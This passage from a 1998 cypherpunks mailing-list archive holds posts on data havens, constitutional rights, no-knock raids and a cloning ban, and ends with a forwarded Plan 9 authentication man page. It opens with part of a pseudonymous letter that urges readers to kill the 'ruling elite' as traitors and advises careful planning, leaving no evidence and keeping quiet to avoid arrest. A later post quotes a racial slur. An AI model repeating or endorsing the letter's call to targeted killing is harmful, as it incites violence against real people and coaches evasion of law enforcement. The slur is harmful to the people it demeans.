>the process. Blowing
>    up innocent children and non-participants is just as much a crime as
>any that the tyrants
>    have committed. The way to change the government is through the
>surgically precise
>    excision of the traitorous lumps. The wiser ones will see the writing
>on the wall, and there
>    will be a spontaneous remission of the treasonous disease.
>
>    The only problem that remains is in identifying the enemy. Moral
>action requires that the
>    right targets be chosen. Focusing on the low level players would not
>significantly affect the
>    treasonous policies. It is the ruling elite that promulgates the
>policies, and it is they who
>    must be held accountable. the charge is willful treason, and the
>sentence is preordained.
>    When the ruling elite realize that they are not immune to
>accountability for their actions,
>    then changes will come quickly.
>
>    The major stumbling block to this plan is that most people don't have
>the guts to carry out
>    the deed. Or if they do, it's a spur of the moment action with no
>planning or preparation.
>    This is not the way to do it. Wars are not won by spur of the moment,
>emotionally ignited
>    actions. They are won by calm, cool planning and sound strategy. It is
>up to the people as
>    individuals, who can't rely on any group or organization. Too many
>have been infiltrated by
>    the enemy. Make sure you know what you are doing before you go off
>half-cocked.
>    There are lots of how-to books on this delicate subject.
>
>    Leave no evidence, have no connecting links, and don't flap your lips.
>The result is no
>    arrests. The ruling elite may call it terrorism, but did they ever
>have a no-knock raid pulled
>    on their house? Were they ever forced to stand in their own homes,
>naked or in their
>    underwear while masked federal or state agents tore the house apart-
>while making crude
>    jokes about their wife and terrorizing their children? Have they ever
>had to try to rebuild a
>    sense of "home" after the government came in and destroyed any
>semblance of security
>    that the family had? Did they have their pregnant wife slammed up
>against the wall, causing
>    her to lose the baby? Did they have to find an answer for their little
>boy, when he asked if
>    the welfare police were going to come back and beat up daddy?
>
>    What is accountability all about? The second amendment ensures that We the
>    People have the means to take down the real terrorists. This is a view
>most
>    people won't openly discuss, though they may hold it deep in their
>hearts. To
>    seriously consider the idea is to potentially confront the inescapable
>conclusion
>    that action, not talk, is required, and that's too much for most.
>
>    Finally, let's talk about what happens if you get caught. There are no
>prisoners in this war:
>    Expect to be crucified. Tried in the press, condemned in the public
>arena, and then put on
>    "trial" in a court that will not allow anything but a guilty verdict.
>Dumped in the worst hell of
>    the prison system, fighting for your life and manhood, unable to
>contact your family or find
>    out anything about them. After years of incarceration, there might be
>an execution, or you
>    might be found dead in your cell, another unfortunate "suicide." But
>if you think the
>    downside is too rough, then read about what happened to the signers of
>the Declaration of
>    Independence. They were uniformly abused, harassed, ruined, and in
>some cases killed.
>    They saw horrible treatment for themselves and their families. Is the
>price they paid worth
>    anything?
>
>    If you are unable to accept the responsibility of fighting for your
>freedom while there is still
>    a bit of freedom to move and communicate, then you had better accept
>the slavery and
>    live with it. There will never be a better time to oppose the tyra.nts
>than now. As in any
>    war, there will be casualties. It may happen to you, whether you are
>in the fight or not.
>    Why wait to fall? Why stick your head in the sand and wait for things
>to get worse? Why
>    not take the fight to the oppressors and at least show them that their
>plans will be
>    opposed?
>
>    Winston Churchill said it best:
>
>         "If you will not fight for the right when you can easily win
>without bloodshed,
>         if you will not fight when your victory will be sure and not so
>costly, you may
>         come to the moment when you will have to fight with all the odds
>against you
>         and only a precarious chance for survival. There may be a worse
>case. You
>         may have to fight when there is no chance of victory, because it
>is better to
>         perish than to live as slaves."
>
>
>
>
>
>
>    About the author: 'The Guardian' is the nom de plume of an individual
>who occasionally
>    sends Media Bypass letters and articles for submission. His work has
>been published in
>    several magazines under various names. He chooses to remain anonymous
>(in view of the
>    above letter) for obvious reasons.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 06:58:01 +0800
To: William Knowles <adam@homeport.org>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <199801132039.PAA14695@homeport.org>
Message-ID: <v03102803b0e19e7f4d1e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:23 PM -0800 1/13/98, William Knowles wrote:

>If I remember Black Unicorn's posts some months back about the
>Seychelles, The Rene government will protect you from extradition
>from any country with their military for what? $6 million?

Or until a higher bid comes in....

Really, there is no security in meatspace. Not compared to the security
mathematics provides.

Whether floating offshore barges or abandoned oil rigs or compliant Third
World dictatorships, no "data haven" with an identifiable nexus in
meatspace will last for long, at least not serving all types of materials.

When I read Sterling's "Islands in the Net," in 1988, I was initially upset
that he'd "discovered" my own developing ideas about data havens (though I
called it crypto anarchy), but then pleased to see how he he'd missed the
boat on the role cyberspace and strong crypto would inevitably play.

But the legacy of "data havens" is that people get the wrong idea, by
thinking of a data haven as a "place." In actuality, what's important are
the retrieval mechanisms, not the place things are possibly stored.

Hence approaches like Blacknet.

(The parallels with the international money system are obvious...it is less
important each year that passes just "where" the underlying store of value
is physically stored. There are some important issues and differences,
though.)


--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 07:08:38 +0800
To: William Knowles <adam@homeport.org>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <199801132039.PAA14695@homeport.org>
Message-ID: <v03102804b0e1a0b6d21b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:23 PM -0800 1/13/98, William Knowles wrote:

>Anguilla seems to be a doing agood job on becoming a country
>willing on hosting data havens.

Oh yeah?

It's been a while since we talked about this (at least on the Cypherpunks
list), but a couple of years ago there was much discusson on the CP list
about just what items would be allowable in Anguilla. Vince Cate gave his
assessment, which I found fairly nebulous, in that it appeared the Ruling
Families would allow what they would allow, and not allow what they would
not allow---there seemed to be a lot of ad hoc rulings.

(Given that copies of "Penthouse" are illegal in Anguilla, if I recall this
correctly, and given that gun are illegal, and drugs are illegal, I rather
doubt that Anguilla would happily host "The Aryan Nations Bomb Site," or
"Pedophile Heaven," or "Gun Smuggler's Digest. " Or the even juicier stuff
any "data haven" with any claim to really being a data haven will surely
have.)

>And there are likely under a hundred oil companies looking
>for firms to 'recycle' their old oil platforms and drilling
>rigs wasting away around the world, I'm sure some might just
>give you one just to be rid of future liability.

Given the willingness of the French to have SDECE sink Greenpeace ships in
neutral ports, how long before a couple of kilos of Semtex are applied to
the underside of these oil rigs?

Given what happened with "pirate broadcast tankers," the future is not bright.

When the first "oil rig data haven" is found to have kiddie porn,
bomb-making info, and (shudder) material doubting the historicity of the
Holocaust, the U.N. will cluck and the public will cheer when it is boarded
and seized, or simply sunk.

As I said in my last piece on this subject, there is no security in
meatspace comparable to what is gotten with mathematics.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Date: Tue, 13 Jan 1998 23:25:15 +0800
To: cypherpunks@cyberpass.net
Subject: Re: (eternity) autonomous agents
Message-ID: <E0xs85A-0000PO-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Ryan Lackey:

>                     A "datahaven country" would have
> to be immune to such tactics -- either having its own strong military 
> (China as datahaven) to defend its national interests, political
> connections (Israel?), or enough trade with the US that shutting off
> data commo would be impossible for economic reasons (Singapore?).  

A virtual datahaven could be constructed eaily provided you knew how to
index controversial matter.

Publish the rude things about the Prophet Mohammed on a server in Israel,
the anti-Serb rants in Croatia, the kiddyporn in Sweden, the violence in
America, the Nazi hate speech in Syria and the anti-scientology stuff in
Germany.

If someone wants to curse and swear at the whole world at once, then 
there is this amazing new invention called hypertext ...

Ross





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Wed, 14 Jan 1998 10:02:19 +0800
To: The Sheriff <cypherpunks@toad.com
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <3.0.5.32.19980110202657.009336a0@popd.ix.netcom.com>
Message-ID: <3.0.5.32.19980113151945.00856dd0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Of course you _have_ that right; I was writing in response to
the assertion that the _Constitution_ says you have it,
when in fact it not only says no such thing, but the
Supremes have occasionally ruled substantially differently.
I agree with Jim Choate that the 9th and 10th leave room for
all sorts of rights that nobody in their right mind
would disagree with but which the government keeps trying
to take away anyway....  but that's no excuse for claiming that
things are explicitly stated there when they're not.

At 04:40 PM 1/11/98 -0400, The Sheriff wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>At 8:26 PM -0800 1/10/98, Bill Stewart wrote:
>>>>> Umm, no, freedom doesn't work like that.  If you open a *private*
>>>>> establishment, you have the right, according to the constitution, to
>>>>> deny *anyone* the right to enter or eat in your restraunt.
>>
>>I don't see freedom of association listed anywhere there;
>>you might construe it as a "taking" or something, but it'd be a stretch.
>>Also, there was a really appalling court case in the 1890s
>>(Plessey vs. Ferguson), in which the Supremes ruled that states
>>could require segregation with separate but equal accommodations;
>>it was somewhat overturned by Brown vs. Board of Education in 1954,
>>but the idea that the government can tell you how to run your business
>>is long established (after all, we'd need much smaller governments
>>if they couldn't be interfering in business.)
>
>Firstly, something being long-established doesn't make it right.
>SO, let's look at it this way, regarding the freedom of association.
>
>You have the freedom to associate with whom you choose, don't you
>think?  It's not in the constitution, but you would throw a fit if
>Uncle Sam told you that it was illegal for you to go play baseball
>with little Billy if little Billy was black and you were white.
>
>AND, in my not so humble opinion, If you have the freedom to play
>with little Billy, then you have the freedom to tell little Billy
>to go fuck himself because you refuse to play with "niggers."

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Womack <thomas.womack@merton.oxford.ac.uk>
Date: Tue, 13 Jan 1998 23:33:54 +0800
To: eternity <cypherpunks@cyberpass.net>
Subject: Re: (eternity) autonomous agents
Message-ID: <01bd2037$68046310$409001a3@mc64.merton.ox.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Ross Anderson wrote:

>A virtual datahaven could be constructed eaily provided you knew how to
>index controversial matter.
>
>Publish the rude things about the Prophet Mohammed on a server in Israel,
>the anti-Serb rants in Croatia, the kiddyporn in Sweden, the violence in
>America, the Nazi hate speech in Syria and the anti-scientology stuff in
>Germany.

I suspect you will still run into things which are illegal anywhere;
national-security stuff can be handled provided you've got a complete list
of pairs of unfriendly nations, but I don't think (eg) the more extreme sort
of kiddyporn is legal *anywhere*.

Tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 05:40:00 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Should police knock before entering - SC to decide [CNN]
Message-ID: <199801132128.PAA28732@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>            SUPREME COURT CASE: SHOULD POLICE KNOCK BEFORE ENTERING?
>                                        
>      SCOTUS graphic January 13, 1998
>      Web posted at: 2:14 p.m. EST (1914 GMT)
>      
>      WASHINGTON (CNN) -- The Supreme Court was being asked Tuesday to
>      decide whether law enforcement officers should ring the doorbell or
>      knock before entering a building if they sense danger.
>      
>      The case focuses on a 1994 incident in Oregon. Hernan Ramirez fired
>      his gun after police broke in his garage window after they received
>      a tip that a fugitive was in the Ramirez house. It was a tip that
>      turned out to be wrong.
>      
>      Ramirez fired his gun without knowing that those intruding were law
>      officers, and once he realized who the intruders were he
>      surrendered.
>      
>      "The police fire back a fusillade of fire, screaming 'police!
>      police!' -- this is the first time Mr. Ramirez realizes that the
>      police are there," said public defender Michael R. Levine.
>      
>      Even though Ramirez was not the fugitive that police had been
>      looking for, they still arrested Ramirez on weapons charges since,
>      as a convicted felon, he was not permitted to possess a gun.
>      
>      A federal judge later ruled that the police search had been
>      unconstitutional. The federal government then brought the case to
>      the Supreme Court, arguing that the increased danger in that
>      particular case had warranted the window-shattering no-knock entry
>      into the Ramirez building.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 14 Jan 1998 04:53:42 +0800
To: thomas.womack@merton.oxford.ac.uk
Subject: Re: (eternity) autonomous agents
In-Reply-To: <01bd2037$68046310$409001a3@mc64.merton.ox.ac.uk>
Message-ID: <199801132039.PAA14695@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Thomas Womack wrote:

| I suspect you will still run into things which are illegal anywhere;
| national-security stuff can be handled provided you've got a complete list

National security stuff has to be source controlled.  You can't expect
the New York Times to not publish the Pentagon papers once they've
leaked.  The responsibility is on the owner of the data to keep it
secret, not on the whole world to help once he's screwed up.  There
are times when the people who get the data may choose not to
redistribute it, but the decision to redistribute has been made before
it gets to the eternity server.  The Times did not steal the Pentagon
papers.

| of pairs of unfriendly nations, but I don't think (eg) the more extreme sort
| of kiddyporn is legal *anywhere*.

Somalia? Go places where the government is either non-existant or
otherwise pre-occupied, and pay to drop IP in.  The locals get
communication infrastructure as long as they leave you alone, but if
the linux box that has the web server goes down, so do the phone
lines.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@dis.org>
Date: Wed, 14 Jan 1998 07:57:51 +0800
To: Tim May <tcmay@got.net>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <v03102804b0e1a0b6d21b@[207.167.93.63]>
Message-ID: <Pine.BSI.3.95.980113152218.18878E-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 13 Jan 1998, Tim May wrote:

> At 1:23 PM -0800 1/13/98, William Knowles wrote:
> 
> >Anguilla seems to be a doing agood job on becoming a country
> >willing on hosting data havens.
> 
> Oh yeah?
> 
> It's been a while since we talked about this (at least on the Cypherpunks
> list), but a couple of years ago there was much discusson on the CP list
> about just what items would be allowable in Anguilla. Vince Cate gave his
> assessment, which I found fairly nebulous, in that it appeared the Ruling
> Families would allow what they would allow, and not allow what they would
> not allow---there seemed to be a lot of ad hoc rulings.

If memory serves me right it was because Vince bounced off the Taxbomber
site because it offered second passports, camouflage passports, and other
products that was considered a fraud, Which to me sounds odd since there
is some other company selling most everthing and then some from an .ai
domain which Vince's company has the monopoly on handing out .ai domains

http://www.ultramec.com.ai
 
> (Given that copies of "Penthouse" are illegal in Anguilla, if I recall this
> correctly, and given that gun are illegal, and drugs are illegal, I rather
> doubt that Anguilla would happily host "The Aryan Nations Bomb Site," or
> "Pedophile Heaven," or "Gun Smuggler's Digest. " Or the even juicier stuff
> any "data haven" with any claim to really being a data haven will surely
> have.)

You also have to wonder how far in the future it will be before the
special forces of some banana republic drops in on Vince to blow-up
his operation for as he advertises publishing censored information 
on ones ex-president on the Internet, or for that matter I have
yet to see abortion information coming from his servers. 

What has happened in Anguilla proves that there will be a need for 
different flavors of datahavens, Different degrees libility that
datahaven owners will want to store information on their servers.  
I would love to open a XXX WWW site in Anguilla pulling in the 
industry average of $5-10K a month and not pay any taxes there, 
But it won't happen in Anguilla with the present adminstration!

> >And there are likely under a hundred oil companies looking
> >for firms to 'recycle' their old oil platforms and drilling
> >rigs wasting away around the world, I'm sure some might just
> >give you one just to be rid of future liability.
> 
> Given the willingness of the French to have SDECE sink Greenpeace ships in
> neutral ports, how long before a couple of kilos of Semtex are applied to
> the underside of these oil rigs?
>
> Given what happened with "pirate broadcast tankers," the future is not bright.

Isn't there a microstate off the coast of England called 'Sealand' run
from a former oil rig/gun battery for the last 20 years?  
 
> When the first "oil rig data haven" is found to have kiddie porn,
> bomb-making info, and (shudder) material doubting the historicity of the
> Holocaust, the U.N. will cluck and the public will cheer when it is boarded
> and seized, or simply sunk.
>
> As I said in my last piece on this subject, there is no security in
> meatspace comparable to what is gotten with mathematics.
> 
> --Tim May

I agree completely, But there is still room for massively distrubted
datahavens on oil rigs, barges, gun batteries, island nations or
hiding in Norm's LAN in Cicero IL.  All the harder to supress that
information.


William Knowles
erehwon@dis.org 

==
The information standard is more draconian than the gold
standard, because the government has lost control of the
marketplace.  --  Walter Wriston 
==
http://www.dis.org/erehwon/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Jan 1998 08:15:21 +0800
To: Blanc <blancw@cnw.com>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <3.0.32.19980112191309.0069b3d8@cnw.com>
Message-ID: <199801140009.QAA17134@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




> Mad Vlad wants to know:
>
>>something most anarchists here will deny is the existence of something
>>that could be called *immoral science*. is there such a thing? 
>............................................................
>
>No.  There are, however, immoral scientists.   One way to skew the
>interpretations of what you write, besides bringing up the subject of
>morality, is to describe things in ways which do not correspond to their
>actual manner of existence:  "science" does not exist without those
>individuals who have set themselves to pursue it.  

hmm, lets see, there were german scientists perfecting the ability
to torture people in the death camps. they were practicing science,
no? was it immoral? no? was it criminal? criminal but not immoral?

>They should bear the
>blame if they practice it immorally.

they should bear a cost, a penalty, a censure, 
imposed by their moral peers.  (oops, there's that word "should". 
yikes, I am really slipping. please forgive me for pretending I
actually have a point here.)

>You again have brought up several issues which can be examined separately
>and do not necessarily coexist:

well, it does help to have a highly fragmented brain to exist in todays
world. one that doesn't think about things like tax money and
evil government scientists at the same moment <g>

>
>There is a book in Objectivist literature which presents the idea of
>"context dropping", which is, that in order for some people to function as
>if things were normal and that what they're doing is consistent with moral
>principles, they must drop a part of their information out of sight, out of
>thought, so that their actions appear logically related and make sense  -
>they eliminate elements from the given context, crucial essentials which
>make the difference in its character.  People like these might practice
>secrecy in keeping information from others, but equally significant, they
>also hide things from themselves.

this is just basic Freudianism. but I agree its what I'm talking about.

>So that's one thing which would explain some scientist's lack of moral
>principles in the pursuit of science.   Then it must be explained why so
>many people aren't complaining about it.  Are they insensitive to their
>mistreatment, sitting ducks for opportunists?  Or maybe these taxpayers are
>equally immoral, thinking only about promised benefits, forgetting about
>the disadvantage of losing control over the quality of their life?

who cares why it is happening? I care, but I also want it stopped. and
I want others to care enough to want, and work, to stopping it.

>It's possible for some people to override the boundaries of decency, even
>if they're otherwise smart enough to pursue science.  But what would you
>expect cryptographers to do about it?

a mere cryptographer can do nothing. a mere anarchist will encourage
you not to. a moral human being might become alarmed enough to 
change their perspective and participate in government, or changing
government, in a way other than watching election commercials between 
the segments of their favorite TV show.  an anarchist will deny such
an activity is even possible.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 14 Jan 1998 09:03:17 +0800
To: William Knowles <erehwon@dis.org>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <Pine.BSI.3.95.980113152218.18878E-100000@kizmiaz.dis.org>
Message-ID: <Pine.SUN.3.91.980113162913.21098A-100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 13 Jan 1998, William Knowles wrote:
> Isn't there a microstate off the coast of England called 'Sealand' run
> from a former oil rig/gun battery for the last 20 years?  

Sealand, about which I wrote about on this list before, was an example 
that should be studied by the offshore advocates. Based in an old 
oilrig housing platform, some unlucky investors attempted to establish 
their own country. They began issuing stamps and passports for their 
"country". As any reasonable person should have expected, nobody would 
move their mail and nobody recognized their passports.

They went bankrupt.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 14 Jan 1998 00:12:02 +0800
To: cypherpunks@toad.com
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
In-Reply-To: <199801130612.AAA25763@einstein.ssz.com>
Message-ID: <199801131602.RAA06619@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> > There is no ban on publishing information on cloning, "just" a ban on the
> > activity.
> 
> Spin doctor bullshit. Without the research there isn't anything to publish.
> By banning the basic research we would in fact be banning the publishing of
> the results of that scientific research.

This is a more significant difference than you let on: if the research is
done abroad, it can be published here.  To the extent that one can
theorize without experimenting, that too can be done here.  

> Not at all. Equating swinging of ones fist in a empty field and swinging it
> into somebodies nose and then taking that supposition as justification to
> ban fist swinging *is* most certainly unconstitutional. Furthermore, robbery

Congress has the power to choose whether to ban acts when the cause a harm
(fists that connect to federal noses), or just to ban acts whether or not
they cause harms (sending threats to government officials; broadcasting
without a license on an unused frequency).  Like it or not, there is no
question that most of these bans -- including the cloning ban -- are
constitutional under the commerce and other powers, the copyrights clause
notwithstanding. 

PS.  I killfiled this guy ages ago on the grounds of rudeness, general
unpleasantness, and especially a complete and utter incomprehension about
how the law in this country operates.  It is as if someone once read some
software company's publicity about how easy it is to operate their
software and concluded they should therefore be able to write programs in
any language.  

Since someone forwarded me this post, I'm replying to it, but I doubt I'll
bother doing so in the future.  I entered this thread because Tim May made
some comments; I respect his writing and I think other people probably do
too.  As a result, it seemed important to offer some basic doctrine as a
response.  Note, again, that I'm not expressing a view on the MERITS of
the legislation, just one law professor's view on whether courts would be
likely to uphold it if it passes. 
 
A. Michael Froomkin          +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law   
U. Miami School of Law       froomkin@ no spam please
P.O. Box 248087              http://www.law.miami.edu/~froomkin/
Coral Gables, FL 33124 USA   It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 14 Jan 1998 07:31:29 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Plan 9's auth() function - partialy secure distributed computing
Message-ID: <199801132352.RAA29571@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From ravage@ssz.com Tue Jan 13 17:51:44 1998
Date: Tue, 13 Jan 1998 17:51:42 -0600
From: Jim Choate <ravage@ssz.com>
Message-Id: <199801132351.RAA29535@einstein.ssz.com>
X-within-URL: http://plan9.bell-labs.com/magic/man2html/6/auth
To: ravage@einstein.ssz.com
Subject: auth


   [search] [index] delim $$ define lbr ' roman "{" ' define rbr ' roman
   "}" '
   
    NAME
    
          ticket - authentication service
          
    DESCRIPTION
    
          This manual page describes the protocols used to authorize
          connections, confirm the identities of users and machines, and
          maintain the associated databases. The machine that provides
          these services is called the authentication server (AS). The AS
          may be a stand-alone machine or a general-use machine such as a
          CPU server. The network database ndb(6) holds for each public
          machine, such as a CPU server or file server, the name of the
          authentication server that machine uses.
          
          Each machine contains three values important to authentication;
          a 56-bit DES key, a 28-byte authentication ID, and a 48-byte
          authentication domain name. The ID is a user name and
          identifies who is currently responsible for the kernel running
          on that machine. The domain name identifies the machines across
          which the ID is valid. Together, the ID and domain name
          identify the owner of a key.
          
          When a terminal boots, the user is prompted for user name and
          password. The user name becomes the terminal's authentication
          ID. The password is converted using passtokey (see auth(2))
          into a 56-bit DES key and saved as the machine's key. The
          authentication domain is set to the null string. If possible,
          the terminal validates the key with the AS before saving it.
          For Internet machines the correct AS to ask is found using
          bootp(8). For Datakit machines the AS is a system called
          p9auth on the same Datakit node as the file server the
          terminal booted from.
          
          When a CPU or file server boots, it reads the key, ID, and
          domain name from non-volatile RAM. This allows servers to
          reboot without operator intervention.
          
          The details of any authentication are mixed with the semantics
          of the particular service they are authenticating so we
          describe them one case at a time. The following definitions
          will be used in the descriptions:
          
        $CH sub c$
                an 8-byte random challenge from a client
                
        $CH sub s$
                an 8-byte random challenge from a server
                
        $K sub s$
                server's key
                
        $K sub c$
                client's key
                
        $K sub n$
                a nonce key created for a ticket
                
        $K lbr m rbr$
                message $m$ encrypted with key $K$
                
        $ID sub s$
                server's ID
                
        $DN sub s$
                server's authentication domain name
                
        $ID sub c$
                client's ID
                
        $UID sub c$
                user's name on the client
                
        $UID sub s$
                user's name on the server
                
   
          
          A number of constants defined in auth.h are also used:
          AuthTreq, AuthChal, AuthOK, AuthErr, AuthTs, AuthTc, AuthAs,
          and AuthAc.
          
      File Service
      
          File service sessions are long-lived connections between a
          client host and a file server. Processes belonging to different
          users share the session. Whenever a user process on the client
          mounts a file server (see bind(2)), it must authenticate
          itself. There are four players in an authentication: the
          server, the client kernel, the user process on the client, and
          the authentication server. The goal of the authentication
          protocol is to convince the server that the client may validly
          speak for the user process.
          
          To reduce the number of messages for each authentication,
          common information is exchanged once at the beginning of the
          session within a session message (see attach(5)): 
          
        Client->Server
                Tsession($CH sub c$)
                
        Server->Client
                Rsession(${CH sub s},~{ID sub s},~{DN sub s}$)
                
   
          
          Each time a user mounts a file server connection, an attach
          message is sent identifying/authenticating the user:
          
        Client->Server
                Tattach($K sub s lbr AuthTs, ~ {CH sub s},~{UID sub c}, ~
                {UID sub s}, ~ K sub n rbr , ~ {K sub n} lbr AuthAc, ~
                {CH sub s}, count rbr )$
                
        Server->Client
                Rattach($ K sub n lbr AuthAs,~{CH sub c},~count rbr$)
                
   
          
          The part of the attach request encrypted with $Ksubs$ is called
          a ticket. Since it is encrypted in the server's secret key,
          this message is guaranteed to have originated on the AS. The
          part encrypted with the $K sub n$ found in the ticket is called
          an authenticator. The authenticator is generated by the client
          kernel and guarantees that the ticket was not stolen. The count
          is incremented with each mount to make every authenticator
          unique, thus foiling replay attacks. The server is itself
          authenticated by the authenticator it sends as a reply to the
          attach.
          
          Tickets are created by the AS at the request of a user process.
          The AS contains a database of which $ID sub c$'s may speak for
          which $UID sub c$'s. If the $ID sub c$ may speak for the $UID
          sub c$, two tickets are returned.
          
        UserProc->AS
                $AuthTreq, ~ CH sub s , ~ ID sub s , ~ DN sub s , ~ ID
                sub c , ~ UID sub c$
                
        AS->UserProc
                $AuthOK, ~ K sub c lbr AuthTc, ~ CH sub s , ~ UID sub c ,
                ~ UID sub s , ~ K sub n rbr , ~ K sub s lbr AuthTs, ~ CH
                sub s , ~ UID sub c , ~ UID sub s , ~ K sub n rbr$
                
   
          
          Otherwise an error message is returned.
          
        AS->UserProc
                $AuthErr$, 64-byte error string
                
   
          
          The user passes both tickets to the client's kernel using the
          fauth system call (see fsession(2)). The kernel decrypts the
          ticket encrypted with $K sub c$. If $UID sub c$ matches the
          user's login ID, the tickets are remembered for any subsequent
          attaches by that user of that file server session. Otherwise,
          the ticket is assumed stolen and an error is returned.
          
      Remote Execution
      
          
          
          A number of applications require a process on one machine to
          start a process with the same user ID on a server machine.
          Examples are cpu(1), rx (see con(1)), and exportfs(4). The
          called process replies to the connection with a ticket request.
          
        Server->UserProc
                $AuthTreq, ~ CH sub s , ~ ID sub s , ~ DN sub s , ~ xxx,
                ~ xxx$
                
   
          
          Here xxx indicates a field whose contents do not matter.
          
          The calling process adds its machine's $ID sub c$ and its $UID
          sub c$ to the request and follows the protocol outlined above
          to get two tickets from the AS. The process passes the $K sub
          s$ encrypted ticket plus an authenticator generated by
          /dev/authenticator from the $K sub c$ ticket to the remote
          server, which writes them to the kernel to set the user ID (see
          cons(3)). The server replies with its own authenticator which
          can be written to the kernel along with the $K sub c$ encrypted
          ticket to confirm the server's identity (see cons(3)). 
          
        UserProc->Server
                $ K sub s lbr AuthTs, ~ CH sub s , ~ UID sub c , ~ UID
                sub s , ~ K sub n rbr , ~ K sub n lbr AuthAc, ~ CH sub s
                , ~ 0 rbr $
                
        Server->UserProc
                $K sub n lbr AuthAs, ~ CH sub s , ~ 0 rbr$
                
      Challenge Box
      
          A user may also start a process on a CPU server from a non Plan
          9 machine using commands such as con, telnet, or ftp (see
          con(1) and ftpfs(4)). In these situations, the user can
          authenticate using a hand-held DES encryptor. The telnet or FTP
          daemon first sends a ticket request to the authentication
          server. If the AS has keys for both the $ID sub c$ and $UID sub
          c$ in the ticket request it returns a challenge as a
          hexadecimal number.
          
        Daemon->AS
                $AuthChal, ~ CH sub c , ~ ID sub c , ~ DN sub s , ~ ID
                sub c , ~ UID sub c $
                
        AS->Daemon
                $AuthOK$, 16-byte ASCII challenge
                
   
          
          Otherwise, it returns a null-terminated 64-byte error string.
          
        AS->Daemon
                $AuthErr$, 64-byte error string
                
   
          
          The daemon relays the challenge to the calling program, which
          displays the challenge on the user's screen. The user encrypts
          it and types in the result, which is relayed back to the AS.
          The AS checks it against the expected response and returns
          either a ticket or an error.
          
        Daemon->AS
                16-byte ASCII response
                
        AS->Daemon
                $AuthOK, ~ K sub c lbr AuthTs, ~ CH sub c , ~ UID sub c ,
                ~ UID sub c , ~ K sub n rbr$
                
   
          
          or
          
        AS->Daemon
                $AuthErr$, 64-byte error string
                
   
          
          Finally, the daemon passes the ticket to the kernel to set the
          user ID (see cons(3)). 
          
      Password Change
      
          Any user can change the key stored for him or her on the AS.
